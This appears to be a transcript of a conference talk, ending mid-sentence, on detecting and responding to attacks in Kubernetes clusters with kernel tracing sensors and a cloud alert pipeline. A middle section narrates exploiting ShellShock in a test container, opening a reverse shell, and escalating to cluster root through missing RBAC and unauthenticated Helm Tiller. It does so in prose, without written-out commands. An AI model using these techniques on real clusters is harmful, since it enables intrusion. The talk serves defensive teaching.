 All right, the official iPad clock says 11.55, so why don't we get started? So my name is Dino D'Asovi. This is my first time attending Kubernetes Con, and also my first time speaking at it. But I was our first Kubernetes admin, set it up, and then we hired Traver, who I basically gave all that to. So I've done a good amount of this stuff, but I wanted to talk about how to scale the defend against attacks as you grow your infrastructure, and especially in Kubernetes environments, because what we're seeing kind of in a lot of places in the industry is that we're no longer being held back by the amount of infrastructure time we have available, and we're just able to scale the number of nodes basically with a click, click, click on the cloud, and you're done. So let's talk about how we actually approach security in those environments. And my background is I'm what I call breaker turn builder. I spent a lot of time breaking security. I started in red teaming, did a lot of security consulting, penetration testing, breaking into websites, software applications, a whole bunch of stuff. Wrote some books on hacking iPhones and Macs. I won a contest called Pone to Own, where I hacked a Mac in a night, did a bunch of all that stuff in security world, presented the Black Hat briefings about how to write hypervisors, how to exploit memory corruption, all this sort of stuff. But over the last several years, I've kind of taken a shift in direction and focused instead on using my understanding of attacks to build security, and especially to build it at scale. So I was director of security at Two Sigma Investments, my kind of first exposure to services-oriented environments, some of the challenges there. I spent the last several years at Square and just recently founded a company called Capsulate where we're building the industry's only real-time attack disruption platform, purposely built for cloud-native environments. And let me tell you about sort of what I'm trying to solve here. In the security industry, we're talking a lot about the cybersecurity skills shortage. And there's a bunch of statistics and a bunch of ridiculous statistics about just how many people we need in order to actually make computing safe and stop breaches as being kind of a regular part of daily life. And the problem with this is, I think it's just fundamentally trying to scale the wrong way. And so saying, yeah, we need 10 gazillion people to manually look through alerts, to manually do all this stuff, to manually audit all this code, to manually find every vulnerability, to manually patch every vulnerability. It's, you know, if you've ever written software, which hopefully most of us have, you realize that maybe that's not the best way to go about it. And security wasn't the only domain with this problem. Operations was as well. You had to rack and stack machines and every machine had to be configured individually in a special snowflake. And I guess it goes without much explanation that that is a pretty antiquated way of looking at things now. And sort of what illustrates this, I think the most clearly, are statistics of number of servers per employee at different types of firms. And so, you know, the average company, it's less than one to one. But clearly Facebook and Google are at the scale, much more significantly through that. And how did they do that? Well they did it by treating operations like a software problem. And this pattern is what we now call the cloud. So that's how I view it. And it's basically just another instance of software eating the world. So first software ate ops, and now it's eating security. And it's actually gonna be really interesting because it's actually gonna really change a lot of how I typically did things and how a lot of people I know did things. But I think it's for the better. So what do I want people to take away from this talk? I want people to think about sort of how do we apply a lot of the things we've learned from the SRE and DevOps transformations to security? So kind of my thought exercise for a lot of this is taking, you know, I saw that ops was very similar to where security is kind of still today. And what principles do they learn and which of those apply so we can actually start from something that works? So one of my favorite quotes from, I'm gonna brutalize his name, Werner Vogels, CTO of Amazon, is if you build it, you run it. This is their philosophy of very similar to SRE and DevOps of basically putting the responsibility on the people that are closest to able to fix the code. And that's how you can scale that. Like it doesn't mean you're responsible for everything. You still have infrastructure teams building infrastructure. You still have, but you don't have, and you can still have like SRE teams helping you, but you don't have one team that's fully responsible for it. And we still typically have one team that is fully responsible for security and that's why it doesn't scale. So I think the new mantra should be, you build it, you help secure it. And security can only scale with shared responsibility. And the more we can push to self-service to application developers and infrastructure teams, the more this scales better. And it actually doesn't require a PhD in the defense against dark arts. It's all very simple stuff. And what I'm gonna talk about today is how to build a continuous security pipeline in cloud native environments and understand which principles of SRE and DevOps apply to security. So starting with a little background. Some of the models that I think are really good to look at. The one that I know the best is the mobile security pipeline at Square that my team and I built. It's a server-driven detection framework operating on millions of devices running thousands of firmware versions in order to identify tampering, jailbreaking or rooting, even if it's previously unknown. So if you have a root that just you only wrote, the system can detect it and it's pretty cool. I also looked at how Google did a lot of their security monitoring with data mining. One of the takeaways that they learned that I think are really useful is that purely statistical, like machine learning approaches, had very poor results. And one of the reasons why is because in machine learning, a 80% true positive rate is actually pretty good. Like that's an academic result. In security, that's equivalent to a 20% false positive rate. So in security, 20% false positives is really bad. And what that also means is as you scale more, like the workload and the number of servers, that amount of false positives basically becomes just a data problem. Beyond the human attention, you have now just saturated your servers and you have saturated the entire pipeline. So that's some of the experience that they had that I think is pretty useful to look to. Also the most recently, Netflix had a presentation about how they approached security monitoring. And they are using EBPF, which if you haven't started looking at EBPF, it is really awesome, but it's also really complicated and requires a really new kernel. I'll talk a little more about that in a little bit, but I think some of their requirements were pretty illustrative. One, they needed the system to be event driven. You can't pull around the network and be like, hey, are you hacked now? No, cool, I'll come back in 10 minutes. How about now? You hacked now? How about now? And then attackers, it's pretty easy to come in and come out and be done. Because in the desktop world, kind of when you're thinking about security of especially advanced attacks, you might watch an attacker for 60 days before you begin to evict them. How many of you want to let an attacker roam around your production environment for 60 days? I mean, you should probably start looking for a new job after day one. I think 60 minutes is too long. I think 60 seconds is too long because it's very easy to get a lot of data out fast. So we have to really change the cadence here. And so that's why it must be event driven. Also, the system must be lightweight. When you have a lot of nodes, the amount of performance overhead scales really quickly and gets really expensive very fast. And they also wanted to have kernel level inspection because with how many attacks against the Linux kernel that are being released today, there's entire open source frameworks full of exploits. And if you think about how long it takes someone to exploit a vulnerability and publish the exploit versus how long it takes you to patch your kernel across your entire fleet, you kind of do the math and you're like, oh, I'm asking, this is a really hard battle to win. And so that's what they were looking for. And what they ended up settling for was EBF probes, which are programmable, lightweight, safe probes that you can run in the kernel on Linux trace events. And I'll talk a little more about that in a little bit. But at the broadest scale, what we're looking at to do to secure our systems is apply the five factors to secure systems that I'm ripping off from Magoo. And basically you start with one, response. Make sure that you'll be able to know about a threat and respond to it effectively. Seconds, make sure there's enough evidence. Make sure you can actually reconstruct what happened and learn because usually there'll be one thing that you see is off and you need to be able to backtrack and see all the things that happened that were significant. There's a good balance there between that and performance. And also focus on containment that you can limit the impact. So there's typically a spectrum between prevention and response and like kind of the bottom three or the more, like the more prevention, the hardening, you set up your environment, you basically make sure you've configured it correctly and then you walk away, right? And you can't have just that. It's sort of like, okay, we built a good bank vault, we put it in the middle of Central Park and we've done our job, it should be fine and we'll just not look at it. A whole security program requires monitoring your response because we know there are known unknowns. Like we know there are new vulnerabilities, we know there are new attacks and so we need to actually be on the lookout for when those happen so that we can actually respond effectively. And the cool thing about online services environments is that the attacker is on your turf. So we think about kind of a game of attack versus defense. The attacker gets to choose the timing and the method whereas the defender gets to prepare the battlefield. So you can carve a nice little valley that looks really tempting and you can wait for them to walk down it and just watch them. That's your prerogative as the defender. And so what I like doing is I like playing chess. I like thinking about strategy. Well, that's how I do defense too. I basically set traps, I basically make really easy avenues that I can watch really effectively and respond really quickly to because the attacker has no way of knowing that. And that's where I can turn information asymmetry to my advantage. So that's why I think kind of a response game is a lot more fun and I'll hopefully it'll kind of get you all interested in it as well. But then we look at prevention, make sure you're patching and all this other stuff because don't rely on a safety net if you don't have to. And elimination, like can you innovate your way out of an entire class of vulnerability? And I think this is a really good way of breaking down kind of this process sort of like the 12 factors are for stateless apps. So what should we call this thing? This is like actually a common joke I heard in the last talk as well. Do we call this sec dev ops? Do we call it dev sec ops? How about dev ops sec? It's like, hey, I can permute. We've all been in programming interviews. Or maybe we'll call it sec ops. What I think of this as is continuous security because the real technology that people are getting out of the cloud is continuous delivery. And when you start thinking about everything in this continuous cycle, you start thinking about big data differently. You think about fast data, not big data. You start thinking about how your architecture systems differently. And you start thinking about security differently as well. And so that's why I like emphasizing continuous security. And so what does that mean to me? It's a software driven pipeline to securing systems. So we act like we're benchmarking a piece of infrastructure or software. Do macro benchmarks and then optimize and optimize and optimize so that you know you're applying your defenses in the right or your effort in the right place. And it doesn't require having a dedicated security team. So I'm gonna show you a really, really simple architecture that is basically a blog post and should look a lot like the sort of case studies that you'll see from like a cloud provider on how to build a streaming IoT analysis pipeline. It's pretty much the same thing. But in order to kind of guide how we're gonna think about this, let's work backwards. Again, ripping off RenderBugles. So let's start talking about server breaches. So how many of you have actually breached a server? Got in remote access? All right, wow, I lost that bet. That's great. And so for those of you that haven't, in haven't done penetration testing and things like that, I think it's really illustrative to see what it's like so you can know what you're defending against because they pretty quickly fall into a lot of common patterns. But I'm gonna talk only about Kubernetes environments. There's a lot of ways to do stuff, but Kubernetes is the new shiny, so let's talk about that. And what do we care about the most? We care about remote commands, execution vulnerabilities that give people actually breach the server. And these are vulnerabilities that were, some high profile ones in the last few years included shell shock, image tragic, a huge number of ones in Apache, but notably a vulnerability in struts that affected Equifax and the entire class of Javadi serialization vulnerabilities that some people called mad gadget. But the common theme with all of these is they're executing a shell. And then you're like, wait a minute, that's, I don't really run shells in my containers that often. Now you have a signal that you can hone in on. There's other things you might wanna look at like people SSHing into a shell or SSHing into a container to fix something in production. This isn't always malicious, but it's probably something you at least wanna keep your eye on. And if people are doing this, it's probably a signal that they need an easier way to do their job. So how I like doing this is I like building monitoring and then you'll see insecure practices and you'll say, hey, all right, now I know the use case. Let's figure out something that meets that use case and is safe and help people do that. And it's sort of like the wisdom of the iPod. People were downloading MP3s and people clearly wanted a digital music experience. They wanted instant gratification of grabbing a song and listening to it on the go. And you could either fight it and call it piracy or you could build the largest music store in the world. I think we know which one actually was more effective. So let's kind of go over like a generic data breach scenario. So first what attackers gonna do is they're either gonna scan your infrastructure in particular or they're gonna scan the entire internet. It's really cheap to scan the entire internet. So even though we all think we're special snowflakes, like don't always think every attack is actually about you. It might just be opportunistic and then they might come back and see which hosts are actually interesting. But it's pretty inexpensive to just scan the internet for these types of vulnerabilities. And actually when I set up our cluster and I set up Ingress on AWS the first time, I was amazed at how much attack traffic was just going continuously. So you just set up anything on AWS, boom, within minutes you're getting, you're getting probed for a bunch of things. So let's try to make their job a little harder. But let's say what happens, they find all these vulnerabilities, they're able to get a shell in a container. And what I find interesting is that a lot of attention is paid on securing the container or securing the host, like the kernel and that environment from the container, but not as much about the entire cluster. And when you think about the cluster, like that's what matters. An individual will know you'll burn it down. Like we burned ours down within 24 hours. It's just gone, next. So compromising a node is not all that interesting. But compromising the entire cluster and persisting that way is way more interesting. When you think about what an attacker actually is trying to do. So we're talking about a couple of ways that are trivial to compromise Kubernetes clusters. And so I don't feel bad talking about them because they're not vulnerabilities. It's just, there's no security there. They're just like, they didn't try, this is not there. So I consider it a obligation to make sure people know the limitations and make their own risk trade off. But yeah, and then they establish persistence and move laterally within that cluster is basically how it's gonna work. So let's start with talking about ShellShock. ShellShock is one of my favorite vulnerabilities because, and you'll see why. You can show people how to, even if people have never exploited vulnerability, if they've used a Linux shell a little bit and they've used Curl, which many people have, you can show people how to exploit it in two minutes. And they can start playing around with it and seeing it like, whoa, wait, I can run commands. But is this how easy it is? You're like, yeah, that's pretty much how easy it is. So this was a vulnerability that abused some functionality in Bash where Bash would pass exported function definitions and environment variables. And in that syntax, you could add extra commands so that when the next, the Bash sub shell was parsing and adding that function definition to the environment, it would also execute that command. So that's the base of ShellShock, which is generally fine on the same system, but sometimes you can pass environment variables across a security boundary. So for instance, like a lot of HTTP headers get turned into environment variables. And this happens in like, you know, CGI, but it also happens in PHP and a lot of other application environments where you may not expect it. You can also, people were also able to pop DHCP servers with this or DHCP clients with this, a lot of fun stuff. So let's engage in a little YOLO and see if my Askinoma link actually works. No, come on, open link, there we go. Sorry, this is my first time using Google Slides for a presentation. And that one, that one, cool. Okay, so this is how easy it is to exploit ShellShock. We're going to connect to a port forward to a vulnerable ShellShock container running in our Kubernetes cluster. It's just a standard Apache server, but kind of old. These came with a test CGI that was just a shell script and this is kind of, you know, historic. Like this is, this was true when I was a teenager, which means basically it's been true forever. So you won't find this as much these days, but it's still the default. But that's one of those instances where you can pass environment variables. Like you can see that those variables are HTTP headers. So let's play some ShellShock. So what we're going to do instead is we're now going to pass some environment, especially formatted value through the content type header, because we can see that content type is one of those variables that it gets. And we're going to do kind of magic incantation and try and run a command. So let's just try and run id and we get a 500 error. It doesn't really tell us very much. So I don't know if it worked. I don't know if it didn't. So now let's try something that will tell us whether it worked like a sleep. One, two, three, four, five. I have a pretty good idea that that worked. But let's be sure. Let's try with two. I can pretend I'm typing to make it more interesting. One thousand, two, one thousand, boom. So now we have this deterministic feedback loop, which really tells us as an attacker that you have some element of control. And the process of attacking systems is finding some element of control, leveraging it for more, leveraging it for more, and kind of building your way up, just like writing software. Like I think the best metaphor that I've heard people describe hacking with is it's just you're building software out of someone else's software. Like out of an existing ecosystem and you have to kind of invent every single step of the way. So I find that people who have done a lot of programming tend to like it. But just making a remote process sleep is not that interesting. What is a little more interesting is getting a remote shell. So we can use the bash command line that I pasted in there to actually use functionality built into bash to redirect from a socket and back to a socket and connect out. So now we're actually hacking. So let's go to the next one. Yes. So what the attacker also does is they're gonna set up a listening, like just like a net cat or something like that. So I'm gonna bounce to my AWS jump box. Now I have to change the IP address because I just gave it away to all of you. All right. And so you can just listen. This is what we're doing in a different window when that's also happening. And so we're just gonna run that command and we're gonna wait for a connection. Boom, we got a shell. And it tells us there's no job control in the shell because bash is not really running with all the normal system bits that it expects. But we can see the run a directory, we can list the files and as an attacker, what you're gonna do is you're gonna look around. You're like, well, where am I? What's going on here? And you can see the host name that we're in a Kubernetes pod. So, oh yeah, Ron Lennox, relatively recent, CentOS 7, and that's basically where the game starts. Now where it gets really interesting is privilege escalation from here. Okay, so these work, we're gonna talk about those. Good, good, good. Yeah, so actually, for a move on to privilege escalation, if you wanna play along at home, we publish this container, so it's really easy to launch a shell shock and then actually see what an attacker can do in your cluster, which I really recommend. But pay attention to the red warning at the bottom. Don't expose the port, only do the Kube-CTL port forward because this is a remote vulnerability. But it's not the only one in your cluster, I'm sure, so it's probably fine. I'm not your normal security guy. I used to jump out of planes. Most security people don't do that. Because it's not safe, why would you do that? But, so this lets you see what an attacker sees if they would land a shell. So you can basically do that and kind of play around with hardening. But now, you're just an unprivileged user and as you can see, I followed all of the best recommendations because I was running the web server as an unprivileged user, but that doesn't matter because what does root in a container really mean? And now, the problem is a lot of Kubernetes configurations are incredibly weak. They don't have RBAC turned on by default. And even some tools, like, so that cluster was installed with cops and it doesn't enable RBAC. So basically, every container is full cluster root all the time. So from that shell, you can download Kube-CTL and just start executing stuff and deploy a new pod, deploy a privileged pod, whatever, it's great. And if that's fixed, if you're using Helm in your cluster, Helm also doesn't require any authentication. So you can just talk to the tiller service and be like, hey, install this chart and you have full cluster root again. So for a kind of a live demo, this is kind of going a little bit in a tangent. But if you wanna see more about that, I did a TurboTocket, Kubernetes NYC on this YouTube link. And I just kind of went through it in 10 minutes and it was pretty fun. But we're playing defenders today. Not gonna teach you all how to cause mischief. So we wanna work backwards from the breach. So according to this template, how do we build a system to monitor and detect this? So we, one, we know that we need to monitor process execution within containers, right? And we need it to be fine grained. We also need to monitor network connections because we wanna know, for instance, how many pods do you have that actually have legitimate need to talk to the Kubernetes API to do stuff? Usually it's the kubla, it's not necessarily your pod. So that might be a good thing to watch for. And then you can figure out when a pod that never does that even attempted it. Also, which pods should be connecting to your tiller service? Almost nothing, right? And so that's another thing that you can kind of set a guard rail, not a guard rail, I think it's more of an electric fence on. And what you also wanna make sure that your system that you set up does is it not, it also logs every attempt because even unsuccessful connections are a good signal. So if you have strict egress filtering so that no one can get out of your cluster, anything trying to get out is a pretty good signal you wanna watch out for. And it'll tell you when something goes wrong. So it's either software that needs to be fixed or some situation that needs to be responded to. So let's talk about how we actually build a continuous security pipeline to get this. So our strategy is first, we want to gain visibility into the activity on our infrastructure. We wanna make sure to enable investigation into past activity because whenever we see something, that's the tip of the iceberg. Something acts out of place, we're gonna wanna drill down deeper and see what's really happening and actually what led up to that point. And in order to scale, we need to, we don't wanna look over the logs. We wanna start writing hard coded logic to generate alerts for this activity. And this is actually the part that I find kind of, I think find people have the most fun with because this is sort of that, where like you take some of the principles of SRE where you bound your toil. So you don't spend all of your time responding manually, you start automating responses. So if something does something weird, just shut it down. And even if you're not a security expert, like just shut it down. Like basically if something is acting anomalously, you can just kill it and move forward. And then if you have enough of a forensic trail, you can give that to a security expert, hire a security company and be like, hey, what went on here? Because I don't know. But at least you're defending yourself. And also build the automated responses to alerts. And do this iteratively. I really like the principle of starting small and iterating because what I'm gonna show you today is just really simple, but it gives you something that you can set up in a few hours and start having some capabilities to do this and to dive deeper as you find that you need to. Because if your visibility shows you that you don't really have any security problems that you've already hardened everything perfectly, you can just stop there. But you have the safety net. And you can come back to it every quarter and see if stuff's happening. It's better than blindly just not knowing. So how are we gonna build the pipeline? First we're gonna have an event sourcing architecture that's gathered from various sources. Existing data sources are good, like logs are great, but it usually doesn't give you as much information as you'd want. So I recommend implementing sensors at various components and various stages of your environment. So monitoring, build pipelines, monitoring production as they behavior as they run and so that you can get more data to feed into this continuous security pipeline. These events we analyze, generate alerts. All of the alerts you should always prefer automatic response where possible. And given that we're in a cycle, we can change the way that our hosts are deployed to make automatic responses more effective and more possible. We can change the software and you work with the teams to make this capability as effective as possible. Just like you would if you're maintaining performance of production infrastructure. So what you do is you reserve your human time to monitor the alerts, do a manual investigation, tune the sensors to get more or less data depending on what you need and automate the responses. So the way that we set this up for our test bed is we have a Kubernetes cluster. It's got an auto scaling set of nodes. And we have a sensor running on every node and then a log feeder that basically sends everything to AWS Kinesis. So we use Kinesis because I don't really want to manage a bunch of this stuff. And so Kinesis is like simple, done, like you do it. And same thing with Lambda. It's like, cool, you scale that. Done, because that's not really what I'm good at. So I'll just let you do it and I'll focus on writing the logic instead. And then one of the outputs you can configure with Kinesis firehose is elastic search. And so this gives us a Kibana instance so we can use the web to browse and go through this data. So this is actually pretty simple. It's kind of a couple days of work to actually make it. So it's not really that much. And so you hear a little deeper dive on how the firehose connects to Lambda. So Kinesis firehose lets you use Lambda for transformation functions. So for us, we're just going to use the identity function. Basically, it's a transformation. Just return the same event. And on the side, if something is interesting, we're going to publish an alert to an SQS queue. And then we can monitor that SQS queue for those alerts and actually automatically respond. So it's actually sort of super easy here. And we can write detection logic in JavaScript or in Python. And the nice thing about that is it scales pretty well with the complexity of the logic. So it's pretty tempting to make a DSL. But this is not that complicated. These are JSON records. And you're writing code to look for a string match, verify some conditions. Why do you need a DSL for that? But when you have a full programming environment, you can scale to more complexity as you need it and not get bounded and stuck by the DSL. So the event sources that are interesting should look at your environment. I'm talking AWS just because that's the one that I speak natively. So translate where appropriate to Azure, GCP, or internal infrastructure. CloudTrail is good. Get all the API activities. See when the stuff is being used. You want network monitoring. So you can see all your VPC flow logs for all your network activity. But there's some limitations here. You don't see things within your Kubernetes cluster as well. Also, you definitely don't see them within a pod. And then system monitoring. So in order to get system level behavior, you want a system monitoring agent. There's five that I talked about here. I'm talking about Capsulate, the open source sensor that we're releasing right about now. I said right about now because I tried to do it today. It'll probably happen tomorrow. Go audit is a pure Go implementation of audit using the kernel audit subsystem. Go BPF is part of the Iovizer project. So all these are GitHub URLs. You can just go there. And it lets you actually write BPF rules that run. I thought I had an hour. Cool. And oh, there's OS Query. It's also a really popular, really cool. And Sysdig. So all of these are good. And what you want to do is dive in deeper. So I've got five minutes. So I'm going to kind of go through a little faster here. Dive in deeper and see what actually happened. There's a couple trade-offs for each of these. What going by kind of the Netflix criteria must be event driven, must be lightweight, and give kernel level inspection and be kernel version independent. Naturally, the one that we wrote from the ground up, we basically checked all those boxes because that's why we did that. And the other thing is audit has terrible performance. The kernel subsystem is synchronous. So when it starts filling the backlog queue, it halts the activity. And so if you're monitoring something like system calls, you will hit that backlog limit even if you just ratchet it up and the system will halt. And you will get parabolic performance penalty. So that kind of is not an option in a lot of environments. So anything using Linux tracing performs much better. So Capsulate, Cystig, GoBPF, Capsulate, Cystig, and GoBPF all use Linux tracing into the hood so they perform a lot better. And shameless plug for the sensor. It's a single static Go binary. We don't use Sego. We just run it. It's fine. It uses all user land APIs so it doesn't actually violate a signed kernel image. And it works everywhere from kernel 2.6 and up. And it's very much in development because we're still building it, but it's alpha, you've been warned, but it's Apache 2.0 licensed so you can play. But this was a piece of our infrastructure that sent all those logs to Kibana for manual search. And you can now do things like say, hey, if someone launched a busy box container in my infrastructure, show me where that happened. And then you can now search for that unique container ID, say, hey, show me everything that happened and give me all process execution events and see everything there. And yeah, I talked a little bit about Lambda. It's easy because it scales up and the language scales up with you, whether you're familiar with JavaScript, Python, or Java. And when you're automating responses, you can take events off that SQS queue and don't overcomplicate it. You can just write a simple shell script that does AWS SQS command line, pipe it to JQ and then pipe that to Kube CTL delete and boom. You have an automatic thing that kicks any offending pod and you can do this at each tier of your infrastructure. As you develop this, the thing that you wanna do is always escalate the attacks you can simulate and your responses and you can keep training yourself. So play with some open source security tools but I recommend doing things like if you have an open source, if you have a bounty program, try and find the researchers before they report the vulnerability. Hire a penetration testing team, try and detect them before they report and when you get really advanced, hire a red team that tries not to get caught and try and catch them and try and make their life hell. And that's basically, once you're at that level, pretty much most attackers are gonna have a really hard time attacking you and you'll do it across your entire environment. Yay, thank you for your time. I think I'm out of time now. So if there's any questions, please come up. Yes? Yes, yeah, they're hot off the presses. Yes, okay, so they gave me the five minute sign so I will just do Q and A until they kick me off the stage. So, all right, next? Sure, yeah, that's another thing that we made sure to design around because when you are having local service proxies and all these other things, what you wanna monitor is who the container thinks it's talking to because the service mesh and all this other stuff is gonna change how it gets there but which service it discovers and which it's reaching out to is really important and so when you're using Linux tracing-based tracing-based infrastructure in containers, you're monitoring the system calls and so you're seeing the address that the application is passing to the kernel and that's how you can identify where that goes and there is definitely some work that you need to do on the backend to kind of enrich the events with where that service was at that time but you know this application is trying to talk to Tiller not talking to this IP address and then three days later trying to figure out what was running on that IP address because the kind of the anti-pattern of security monitoring in the modern world is looking at an IP address and then be like, okay, cool, I had 100 containers running on that IP address five days ago or 30 days ago, what do I do now? It's just no longer a meaningful identifier and also with things like domain fronting and works really well in the cloud, domain fronting is a technique where you connect to a web service under one name so your DNS lookup is for one name and your HTTP host header is another name so like Google and a lot of other services do this where you can reach any service from any entry point and you think about how Ingress works you kind of figure out how that stuff works too so it's really easy for an attacker to evade these IP address-based things, yes? Yep, I have a little bit. So one of our engineers installed container Linux or clear Linux and went to town on it and then everything broke and found out it was a little more work for his desktop than he wanted but what I discovered kind of being on both sides of being a security person saying, hey, we need to reduce attack surface and so initially we started with for our own development using from scratch Docker containers and then debugging those in production was impossible and debugging like how for instance, hey, why is this container not able to resolve this service? Everyone else can, but that one can't, I don't know. What does it think it's connecting to? You can't get a shell in there and there's people have workarounds for that so I kind of, how I resolve this myself is the extra two megs for a busy, you know, doing from Busybox or from Alpine are well worth it for that debuggability and what you really care about is the security boundary outside the container so have a shell in there, it's no big deal but focus on the container security boundary and the kind of the cluster security boundary and one of the limitations of a lot of the hypervisor based container run times is they don't really do much for the interface to the Kubernetes API. So you still have cluster root, you just can't do anything to the node. So I'm like, all right, that's a lot of good that does. Wait, behind you? No, we just realized that the magic of BPF is really Linux tracing. So you can get all of that through Perf and so that's, you basically get all the K probes, trace points, U probes through Perf and that goes back to 2639 and is, you know, but BPF gives you is the ability to do advanced filtering but with just existing trace events you have a rudimentary AST based filter built into the kernel. So you can do logical expressions and other things so that you're not throwing every event to user land and when you are throwing events to user land it's over a high speed ring buffer. So it's actually not that bad. Yeah, so it's basically, it's fun, it's like, if you looked into the architecture of Sysdig like they have a kernel module to do stuff that the kernel already does. So you already have the ring buffers for Perf, you already have the trace events accessible through Perf and I didn't, you know, I'd like to indirectly thank Brendan Gregg for his blog posts for, that's how I figured this stuff out. I was like, oh, that's cool. Any other questions? Yes, sir? Similar to like the clear containers project, I see a lot of this hardening is necessary but not sufficient. Like I don't want to denigrate this work. It's all really cool and like I wrote a hypervisor in a past life and I think that stuff is really cool but you still, so that's a really good way to have that host isolation but there's performance downsides. You're basically committing a bunch of RAM and the kernel interface is generally pretty good anyway but they don't do much for that like kind of the orchestrator level security and when I work backwards from a breach and like kind of think about as an attacker, how am I gonna attack this? How am I gonna get the objectives that I want? How am I gonna achieve the objectives that I want? I see, once I see any security projects going in a certain direction and you're like, yeah, I just don't even bother looking. Like I can't remember who had the quote. So they said something about cryptography is great. It tells me where is an attacker not to look. It's like, don't even bother, you know? Like and same thing with, I see the same thing with memory protection systems like ASLR, you randomize locations and stuff and when you're an attacker, like if there's, it's easy to start thinking about the strength of ASLR and the number of bits of entropy, just doing a quantitative analysis but whether it's really four bits or 256 bits, it doesn't really matter because once you have more than one bit of entropy, as an attacker, you're gonna start working around it. So that's kind of how I see a lot of the hardening is when there's, there's a lot of effort there, you don't really know what's gonna be there but you know that Kubernetes doesn't really do a lot currently. Yes, it does, yes, it's a good point. Yeah, we don't yet and so for our internal system that this is based on, it's a big blind spot. So until we fix that, no one go hack our build servers, please. Yeah. Oh, sorry, yeah, he mentioned, pointed out that the Kubernetes API servers have an audit log and that would be an excellent event source for the system so that you could see when a pod is abusing the API or abusing its privileges. Thank you, any other, yes sir? That's another very good point, I should have made that. A signal stopping is a huge signal in and of itself and one of, when you're really getting serious about designing these systems, what you also wanna make sure to do is tie in kind of the monitoring with a transaction so that they can't turn it off and still be functional. So if you can implement a way where if you don't see any events from a node in a certain period of time, turn off its port. There's no events, shouldn't be on the network. It's not doing anything and you can kind of experiment with this stuff so that turning off an attack or sorry, turning off a monitoring agent is the biggest red signal, biggest red flag on the play and possible. Actually, let's change from comments to pro tips. Anyone else have any good pro tips on doing things like this? I might put another dude on the spot about how to do this at large scale. Yeah, I'm looking at you. Oh, sorry, I'm looking at Mike. It's Linux only, yeah. Yeah, we're focused completely on production environments. Is it in the back? Yeah, that's a good point. Definitely apply our back to Helm or to Tiller so that basically it is isolated on what it can do even given kind of a lack of authentication and also the thing I didn't mention is if you're using, this is where I'm definitely on the border of my knowledge. Using things like Calico and having that workload separation built into the network layer, it's gonna be impossible for you to hit Tiller that's running in a different namespace. But without that, it's a flat, even though if it's in a separate Kubernetes namespace, you can still reach it over the network and you can still resolve it through Kube DNS. So no matter what Kubernetes namespace you're in. And there's actually a lot of great work being done with, or repeat the question, there's work being done with Tiller to do delegated authentication and authorization using the user's credentials. And there's pretty exciting stuff happening with Spiffy right now and building kind of identity aware, like workload identity aware authentication into the fabric of your cluster. And I don't, I haven't seen how far they've gotten with like delegation, but that's sort of the next step. And so it's stuff that, I think why Kubernetes 2.0, we're gonna have a lot of this and that's the secure version. Honestly, I don't really think a lot about that. So I don't wanna give advice that I haven't thought through. I know people have done cool stuff with vaults, I was at Square when we open sourced KeyWiz, and actually ironically, I was like, wait, we're open sourcing? The thing where we put all our secrets? Is mine the only one that thinks is a bad idea? We're telling people where our secrets are and how it works. But it turns out, you actually do get a lot of benefit out of it and making the system stronger, but that took a perspective shift on my side. With SED, the thing that I've seen with kind of my experimentation and different cluster setup tools is that you don't always have authentication on the SED masters. And so even if it's authenticated, you can just access the keys directly. And there's a lot of these areas where, well, it'd be great to have, make sure that there's authentication on the Kubelet, which it supports, but for some reason it's not configured by this tool. And my advice I usually give people is there's a lot of knobs that you'd be surprised, aren't turned on by default in different tools. So if you don't wanna go through all this stuff, a cloud provider or a commercial distribution of Kubernetes tends to be your best, your best option. Yeah, sure. So I don't actually believe, like my philosophy on these things is I don't like hard blocks because it has a high potential of breaking things. What I like is a low latency response. Because when you are out of line, but have a low latency response, you can, you have a lot more options. And you don't wanna do pure bulk data analysis because that increases the latency significantly. But if you look at how a lot of people do things like automated trading is one example, you'll do a lot of data analysis to build the models to run in real time. And I think that is a good model for defending your infrastructure because you are penalized similarly. If you make the wrong decision fast, that's bad. If you make the right, if you miss something fast, that's also bad. But you need data analysis in order to inform what actions you're gonna take in real time. And so what I focus on, and we focus on at Capsule 8 is a low latency response, a low latency automated response to security incidents and kind of that architecture. But I don't wanna go too much into the product plug. So I'm just gonna talk about the open source component. And that doesn't do any of that today. Yeah, it's a read-only event stream. It's a, uses probes. So basically it is a, you can call it like the analog of eventually consistent. Because blocking tends to be really disastrous in production environments. But you have to go through a pretty significant system load to start dropping events with Perf and the ring buffers. In a Kubernetes environment, yeah, recommend the daemon set. It's one command to do it. Yeah, I mean, I think the, if you, for like the Capsule 8 sensor is a single binary. So we provide a Docker file for it. And it's pretty easy to throw that in a daemon set and you're good. And then there's a GRPC API to communicate with it to gather all the telemetry that you're interested in and provide filtering options that are all evaluated in the kernel. So you can say, and it's all dynamic subscriptions. So you can say, hey, this is what I want. So you can have one level agent that is, or one level subscription that is monitoring something across the board at one performance profile. And when something interesting happens, you can then increase the subscription. You can say, oh wow, that container is interesting. I wanna see everything that it does. And I'll pay the performance penalty to log every system call for that container in particular. And so on. Yes sir. You're doing a lot of similar things, but one of the things I noticed about OSSEC is that I kind of like using cloud APIs because one of the things that I like about this architecture of putting detection logic in AWS Lambda is the attack surface is minimal, right? Because you don't have to worry about, because for instance, all right, let's put our attacker hats on. Okay, so where that detection logic is, I wanna know what the detections are, and I wanna modify them, right? And we're also where all the logs are, I wanna know that and modify it. And so if you make that more difficult, you're winning. So that's why I like Lambda, because I'm like, yeah, I'll just write my logic in there and let Amazon scale it. And I mean, if Amazon's infrastructure is compromised, and I'm pretty much host anyway, but that's one piece I have to worry less about. And I don't like, it's not really that complicated. So I didn't see a benefit to adapting it. Well, because if you're using a cloud provider, you're already depending on the security of their environment, plus also your credentials and your IAM isolation model and other things. And this is an easy way where you can, if you also care about sort of separation of concerns among staff, you can even do things like say, all right, cool. Well, for various reasons, we won't let one team look at the data, but we'll let them write the detections. And they can see the alerts, but they can't see raw data because there might be PII in there or something like that. And you can implement a lot of that a lot easier with those tools. Also, they're new and shiny. Cool, does anyone want me to repeat that? Be able to hear them? Cool, thanks. Yeah, so right now, just looking at things like health check, make sure that it's still running and using kind of Kubernetes health monitoring to identify when it has been shut down. But when you think about tamper-proofing or making tamper-resistant software that runs in an environment that could be compromised, it's a bit challenging, but I spent several years doing it, so I have my ways that I like doing it. And what I find works well is that what an attacker can't do is they can't be everywhere at once, and they also can't go back in time. So if you figure out that terrain and you're like, okay, what is really hard for them? If I'm gonna modify the software, I'm gonna need to reverse engineer it, I need to know how to do it, I'm gonna need to do this stuff that will generate signal until it happens and also they'll have to have some preparation and those are pressure points that you can add difficulty. On that side, go binaries are incredibly easy to reverse engineer. They love having 